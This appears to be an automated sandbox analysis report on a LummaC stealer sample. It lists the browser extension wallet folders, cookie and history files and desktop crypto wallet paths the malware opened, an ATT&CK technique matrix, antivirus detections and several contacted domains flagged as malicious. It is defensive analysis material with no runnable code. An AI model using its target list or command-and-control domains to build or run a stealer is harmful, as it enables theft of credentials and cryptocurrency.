Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\BWETZDQDIB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\BWETZDQDIB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\FAAGWHBVUU	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\FAAGWHBVUU	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\SNIPGPPREP	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\SNIPGPPREP	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\SNIPGPPREP	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\SNIPGPPREP	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	22 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	311 Process Injection	3 Obfuscated Files or Information	LSASS Memory	1 Network Service Discovery	Remote Desktop Protocol	31 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	1 DLL Side-Loading	Security Account Manager	11 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	Login Hook	12 Masquerading	NTDS	43 System Information Discovery	Distributed Component Object Model	2 Clipboard Data	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	22 Virtualization/Sandbox Evasion	LSA Secrets	351 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	311 Process Injection	Cached Domain Credentials	22 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
7IXl1M9JGV.exe	13%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.dll	100%	Avira	HEUR/AGEN.1300034
C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.dll	100%	Joe Sandbox ML

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://publickeyservice.gcp.privacysandboxservices.com	0%	Avira URL Cloud	safe
standartedby.shop	100%	Avira URL Cloud	malware
http://polymer.github.io/PATENTS.txt	0%	Avira URL Cloud	safe
http://polymer.github.io/AUTHORS.txt	0%	Avira URL Cloud	safe
moutheventushz.shop	100%	Avira URL Cloud	malware
https://issuetracker.google.com/349489248	0%	Avira URL Cloud	safe
https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE	0%	Avira URL Cloud	safe
https://knifedxejsu.cyou/	100%	Avira URL Cloud	malware
https://www.rest.co.il	0%	Avira URL Cloud	safe
http://unisolated.invalid/	0%	Avira URL Cloud	safe
bakedstusteeb.shop	100%	Avira URL Cloud	malware
https://windows-drivers-x04.blogspot.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
knifedxejsu.cyou	104.21.19.177	true	true		unknown
www.google.com	142.251.35.164	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
moutheventushz.shop	true	Avira URL Cloud: malware	unknown
standartedby.shop	true	Avira URL Cloud: malware	unknown
bakedstusteeb.shop	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://mail.google.com/mail/?usp=installed_webapp	chrome.exe, 00000008.00000002.2133904022.000009B400A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139410870.000009B4013A4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	chrome.exe, 00000008.00000002.2135517261.000009B400DC0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing	chrome.exe, 00000008.00000002.2131238480.000009B4003C0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.rest.co.il	chrome.exe, 00000008.00000003.1272121186.000009B401340000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://dl.google.com/release2/chrome_component/cxxqn654fg7hzrcrrnqcniqqye_2024.10.11.1/kiabhabjdbkjd	chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/J	chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137289557.000009B40107C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone	chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137474127.000009B4010C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_	chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137474127.000009B4010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.966951550.000009B400395000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133430794.000009B400950000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2129411778.000009B40005A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.968219385.000009B400395000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE	chrome.exe, 00000008.00000002.2131960348.000009B400688000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137474127.000009B4010C8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/	chrome.exe, 00000008.00000002.2133904022.000009B400A04000.00000004.00000800.00020000.00000000.sdmp	false		high
http://dl.google.com/release2/chrome_component/cvde376f6tyxybuonyzcqfilye_2024.10.30.0/niikhdgajlphf	chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://dns-tunnel-check.googlezip.net/connect	chrome.exe, 00000008.00000002.2138838858.000009B4012CC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dl.google.com/release2/chrome_component/adrga7eefaxjfdmmgfkiaxjg4yjq_2024.7.12.235938/eeigpn	chrome.exe, 00000008.00000002.2132716182.000009B400814000.00000004.00000800.00020000.00000000.sdmp	false		high
https://publickeyservice.gcp.privacysandboxservices.com	chrome.exe, 00000008.00000003.995658757.000009B0006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://polymer.github.io/AUTHORS.txt	chrome.exe, 00000008.00000003.972811086.000009B400510000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.970825869.000009B401604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971217420.000009B400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973480513.000009B400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973089654.000009B401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971344270.000009B401664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.971109499.000009B401630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.972963112.000009B400544000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docs.google.com/document/:	chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137289557.000009B40107C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.therealreal.com/cart	chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://publickeyservice.pa.aws.privacysandboxservices.com	chrome.exe, 00000008.00000003.995658757.000009B0006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeer7	chrome.exe, 00000008.00000002.2131960348.000009B400688000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.shutterfly.com/cart/	chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.urbanoutfitters.com/cart	chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.saksfifthavenue.com/cart	chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/p	chrome.exe, 00000008.00000002.2133973444.000009B400A38000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.zappos.com/cart	chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp	chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.guitarcenter.com/cart	chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://unisolated.invalid/	chrome.exe, 00000008.00000002.2135517261.000009B400DC0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://setup.office.com	chrome.exe, 00000008.00000002.2137246401.000009B401070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134091279.000009B400AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1046293799.000009B4020E4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.altardstate.com/cart/	chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/tips/	chrome.exe, 00000008.00000002.2133973444.000009B400A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134562051.000009B400BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134871796.000009B400C48000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.google.com/dl/release2/chrome_component/cpx7rw4q3nwu7emczqf2w6cu7y_2023.3.30.1305/cocncan	chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/?lfhs=2	chrome.exe, 00000008.00000002.2137374756.000009B40109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138020397.000009B40118C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2135770117.000009B400E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138838858.000009B4012CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ogs.google.com/widget/callout?eom=1	chrome.exe, 00000008.00000003.985462586.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989999147.000009B40148C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.988406192.000009B4019BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985646219.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985862674.000009B401588000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141656584.000009B401980000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989939605.000009B401944000.00000004.00000800.00020000.00000000.sdmp	false		high
http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)	chrome.exe, 00000008.00000002.2133612138.000009B40099C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2132290116.000009B400778000.00000004.00000800.00020000.00000000.sdmp	false		high
https://account.live.com/Abuse?mkt=EN-US&uiflavor=web&client_id=1E000040382627&id=293577&lmif=40&abr	chrome.exe, 00000008.00000002.2134616236.000009B400BD8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.bestbuy.com/cart	chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ikea.com/us/en/shoppingcart/	chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://setup.office.com/?ms.officeurl=setup	chrome.exe, 00000008.00000002.2136867640.000009B400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139191010.000009B401350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137770733.000009B401130000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.youtube.com/?feature=ytca	chrome.exe, 00000008.00000002.2137374756.000009B40109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130814925.000009B400320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/browser-tools/	chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/u/0/create?usp=chrome_actions	chrome.exe, 00000008.00000002.2138795443.000009B4012BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134562051.000009B400BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2135014565.000009B400C9C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.williams-sonoma.com/shoppingcart/	chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/?q=	chrome.exe, 00000008.00000002.2133973444.000009B400A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134172551.000009B400AC4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore	chrome.exe, 00000008.00000003.972919073.000009B40155C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1110933299.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1270303469.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.969800499.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1323174553.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.967814195.000009B400A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.972505265.000009B400A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130454553.000009B40023C000.00000004.00000800.00020000.00000000.sdmp	false		high
